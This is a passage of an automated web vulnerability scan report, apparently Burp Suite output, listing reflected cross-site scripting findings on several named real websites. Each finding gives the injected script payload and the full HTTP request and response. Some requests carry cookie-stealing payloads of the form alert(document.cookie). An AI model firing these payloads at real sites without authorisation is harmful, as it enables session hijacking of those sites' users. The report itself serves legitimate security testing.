4.1878. http://www25.big.jp/styles.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www25.big.jp
Path:   /styles.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8cb0a<script>alert(1)</script>b9f156601de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles.css8cb0a<script>alert(1)</script>b9f156601de HTTP/1.1
Host: www25.big.jp
Proxy-Connection: keep-alive
Referer: http://www25.big.jp/~jamfe517%3Cscript%3Ealert(document.cookie)%3C/script%3Ec6ee4a3cfa8/leafnode+/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:28:33 GMT
Server: Apache/2.2.15 (Unix) DAV/2
Content-Length: 2654
Content-Type: text/html; charset=UTF-8


<Html Lang="ja">
<Head>
<Title>1GB............................................. Amusement BiG-NET | www25.big.jp/styles.css8cb0a<script>alert(1)</script>b9f156601de</Title>
<Meta Http-equiv="content-
...[SNIP]...
<Font Class="topics">http://www25.big.jp/styles.css8cb0a<script>alert(1)</script>b9f156601de</FONT>
...[SNIP]...

4.1879. http://www25.big.jp/styles.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www25.big.jp
Path:   /styles.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload c2b33</title><script>alert(1)</script>909c52e451 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /styles.cssc2b33</title><script>alert(1)</script>909c52e451 HTTP/1.1
Host: www25.big.jp
Proxy-Connection: keep-alive
Referer: http://www25.big.jp/~jamfe517%3Cscript%3Ealert(document.cookie)%3C/script%3Ec6ee4a3cfa8/leafnode+/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:28:37 GMT
Server: Apache/2.2.15 (Unix) DAV/2
Content-Length: 2668
Content-Type: text/html; charset=UTF-8


<Html Lang="ja">
<Head>
<Title>1GB............................................. Amusement BiG-NET | www25.big.jp/styles.cssc2b33</title><script>alert(1)</script>909c52e451</Title>
<Meta Http-equiv="c
...[SNIP]...

4.1880. http://www25.big.jp/~jam/leafnode+/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www25.big.jp
Path:   /~jam/leafnode+/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fe517<script>alert(1)</script>c6ee4a3cfa8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /~jamfe517<script>alert(1)</script>c6ee4a3cfa8/leafnode+/ HTTP/1.1
Host: www25.big.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:16 GMT
Server: Apache/2.2.15 (Unix) DAV/2
Content-Length: 2664
Connection: close
Content-Type: text/html; charset=UTF-8


<Html Lang="ja">
<Head>
<Title>1GB............................................. Amusement BiG-NET | www25.big.jp/~jamfe517<script>alert(1)</script>c6ee4a3cfa8/leafnode+/</Title>
<Meta Http-equiv="con
...[SNIP]...
<Font Class="topics">http://www25.big.jp/~jamfe517<script>alert(1)</script>c6ee4a3cfa8/leafnode+/</FONT>
...[SNIP]...

4.1881. http://www25.big.jp/~jam/leafnode+/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www25.big.jp
Path:   /~jam/leafnode+/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 4d9b2</title><script>alert(1)</script>c5f823129ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /~jam4d9b2</title><script>alert(1)</script>c5f823129ca/leafnode+/ HTTP/1.1
Host: www25.big.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:18 GMT
Server: Apache/2.2.15 (Unix) DAV/2
Content-Length: 2680
Connection: close
Content-Type: text/html; charset=UTF-8


<Html Lang="ja">
<Head>
<Title>1GB............................................. Amusement BiG-NET | www25.big.jp/~jam4d9b2</title><script>alert(1)</script>c5f823129ca/leafnode+/</Title>
<Meta Http-eq
...[SNIP]...

4.1882. http://www25.big.jp/~jam/leafnode+/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www25.big.jp
Path:   /~jam/leafnode+/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 6a9c1</title><script>alert(1)</script>657fbadbcca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /~jam/leafnode+6a9c1</title><script>alert(1)</script>657fbadbcca/ HTTP/1.1
Host: www25.big.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:22 GMT
Server: Apache/2.2.15 (Unix) DAV/2
Content-Length: 2680
Connection: close
Content-Type: text/html; charset=UTF-8


<Html Lang="ja">
<Head>
<Title>1GB............................................. Amusement BiG-NET | www25.big.jp/~jam/leafnode+6a9c1</title><script>alert(1)</script>657fbadbcca/</Title>
<Meta Http-eq
...[SNIP]...

4.1883. http://www25.big.jp/~jam/leafnode+/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www25.big.jp
Path:   /~jam/leafnode+/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7ad79<script>alert(1)</script>a8eb4739661 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /~jam/leafnode+7ad79<script>alert(1)</script>a8eb4739661/ HTTP/1.1
Host: www25.big.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:20 GMT
Server: Apache/2.2.15 (Unix) DAV/2
Content-Length: 2664
Connection: close
Content-Type: text/html; charset=UTF-8


<Html Lang="ja">
<Head>
<Title>1GB............................................. Amusement BiG-NET | www25.big.jp/~jam/leafnode+7ad79<script>alert(1)</script>a8eb4739661/</Title>
<Meta Http-equiv="con
...[SNIP]...
<Font Class="topics">http://www25.big.jp/~jam/leafnode+7ad79<script>alert(1)</script>a8eb4739661/</FONT>
...[SNIP]...

4.1884. http://www25.big.jp/~jam/leafnode+/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www25.big.jp
Path:   /~jam/leafnode+/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 886be</title><script>alert(1)</script>e48585103f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /~jam/leafnode+/?886be</title><script>alert(1)</script>e48585103f0=1 HTTP/1.1
Host: www25.big.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:08 GMT
Server: Apache/2.2.15 (Unix) DAV/2
Content-Length: 2686
Connection: close
Content-Type: text/html; charset=UTF-8


<Html Lang="ja">
<Head>
<Title>1GB............................................. Amusement BiG-NET | www25.big.jp/~jam/leafnode+/?886be</title><script>alert(1)</script>e48585103f0=1</Title>
<Meta Http
...[SNIP]...

4.1885. http://www25.big.jp/~jam/leafnode+/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www25.big.jp
Path:   /~jam/leafnode+/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 68775<script>alert(1)</script>9e9dc9952f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /~jam/leafnode+/?68775<script>alert(1)</script>9e9dc9952f3=1 HTTP/1.1
Host: www25.big.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:06 GMT
Server: Apache/2.2.15 (Unix) DAV/2
Content-Length: 2670
Connection: close
Content-Type: text/html; charset=UTF-8


<Html Lang="ja">
<Head>
<Title>1GB............................................. Amusement BiG-NET | www25.big.jp/~jam/leafnode+/?68775<script>alert(1)</script>9e9dc9952f3=1</Title>
<Meta Http-equiv="
...[SNIP]...
<Font Class="topics">http://www25.big.jp/~jam/leafnode+/?68775<script>alert(1)</script>9e9dc9952f3=1</FONT>
...[SNIP]...

4.1886. http://www3.whdh.com/mobile/phoneforecast/settings.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www3.whdh.com
Path:   /mobile/phoneforecast/settings.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bebc"><script>alert(1)</script>b51006e4a2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5bebc\"><script>alert(1)</script>b51006e4a2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobile/phoneforecast/settings.php/5bebc"><script>alert(1)</script>b51006e4a2e HTTP/1.1
Host: www3.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:10:29 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: WHDHSTR=7a8ccd97e16fa89d1e1ade44f062356c; expires=Thu, 26-Jan-2012 00:10:29 GMT; path=/; domain=.whdh.com
Set-Cookie: PHPSESSID=997d49194ce1394ab37bc9f94e006b91; path=/
Expires: Wed, 26 Jan 2011 00:10:29 GMT
Cache-Control: max-age=86400, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 10247

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Mobile Alerts - Daily Phone Forecast Account Settings</title>
<meta name="publisher"
...[SNIP]...
<form id="myform" name="myform" action="/mobile/phoneforecast/settings.php/5bebc\"><script>alert(1)</script>b51006e4a2e" method="post">
...[SNIP]...

4.1887. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8efaa"><script>alert(1)</script>9136b0f006 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8efaa"><script>alert(1)</script>9136b0f006

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=8efaa"><script>alert(1)</script>9136b0f006" />
...[SNIP]...

4.1888. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload e1557<script>alert(1)</script>1877a8f3a1f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e1557<script>alert(1)</script>1877a8f3a1f

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<h4>e1557<script>alert(1)</script>1877a8f3a1f - Google search</h4>
...[SNIP]...

4.1889. http://www.autobytel.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 43b1a--><img%20src%3da%20onerror%3dalert(1)>19c294b5521 was submitted in the Referer HTTP header. This input was echoed as 43b1a--><img src=a onerror=alert(1)>19c294b5521 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=43b1a--><img%20src%3da%20onerror%3dalert(1)>19c294b5521

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:06:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:06:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:06:11 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E43b1a%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E19c294b5521;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 71149


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: 43b1a--><img src=a onerror=alert(1)>19c294b5521 -->
...[SNIP]...

4.1890. http://www.autobytel.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98463"%3balert(1)//4b2bfd1744b was submitted in the Referer HTTP header. This input was echoed as 98463";alert(1)//4b2bfd1744b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=98463"%3balert(1)//4b2bfd1744b

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:06:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:06:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:06:03 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E98463%22%3Balert%281%29%2F%2F4b2bfd1744b;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 71104


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~98463";alert(1)//4b2bfd1744b";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48E84A1E-FBE0-BED8-F032B9F4
...[SNIP]...

4.1891. http://www.autobytel.com/a.cfml [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /a.cfml

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd812"%3balert(1)//9e2802c099f was submitted in the Referer HTTP header. This input was echoed as cd812";alert(1)//9e2802c099f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a.cfml HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=cd812"%3balert(1)//9e2802c099f

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 23598
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:46:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:46:28 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:46:28 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:46:28 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ecd812%22%3Balert%281%29%2F%2F9e2802c099f;path=/
Set-Cookie: PV_CT=3;path=/


<!-- begin: fnc_getComputerName.cfm -->

<!-- end: fnc_getComputerName.cfm -->
<!-- ReferringSite: www.google.com --> <!-- Referer: http://www.google.com/search?hl=en&q=cd812"%3baler
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~cd812";alert(1)//9e2802c099f";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4834FFF0-C164-F7B0-ECFFDD80
...[SNIP]...

4.1892. http://www.autobytel.com/a.cfml [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /a.cfml

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 15764--><img%20src%3da%20onerror%3dalert(1)>d38ec732909 was submitted in the Referer HTTP header. This input was echoed as 15764--><img src=a onerror=alert(1)>d38ec732909 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /a.cfml HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=15764--><img%20src%3da%20onerror%3dalert(1)>d38ec732909

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 23661
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:46:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:46:36 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:46:36 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:46:36 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E15764%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Ed38ec732909;path=/
Set-Cookie: PV_CT=3;path=/


<!-- begin: fnc_getComputerName.cfm -->

<!-- end: fnc_getComputerName.cfm -->
<!-- ReferringSite: www.google.com --> <!-- Referer: http://www.google.com/search?hl=en&q=15764--><img%
...[SNIP]...
<!-- searchphrase: 15764--><img src=a onerror=alert(1)>d38ec732909 -->
...[SNIP]...

4.1893. http://www.autobytel.com/ask-our-mechanics/my-garage.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /ask-our-mechanics/my-garage.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 303f1--><img%20src%3da%20onerror%3dalert(1)>22eba66e9cd was submitted in the Referer HTTP header. This input was echoed as 303f1--><img src=a onerror=alert(1)>22eba66e9cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

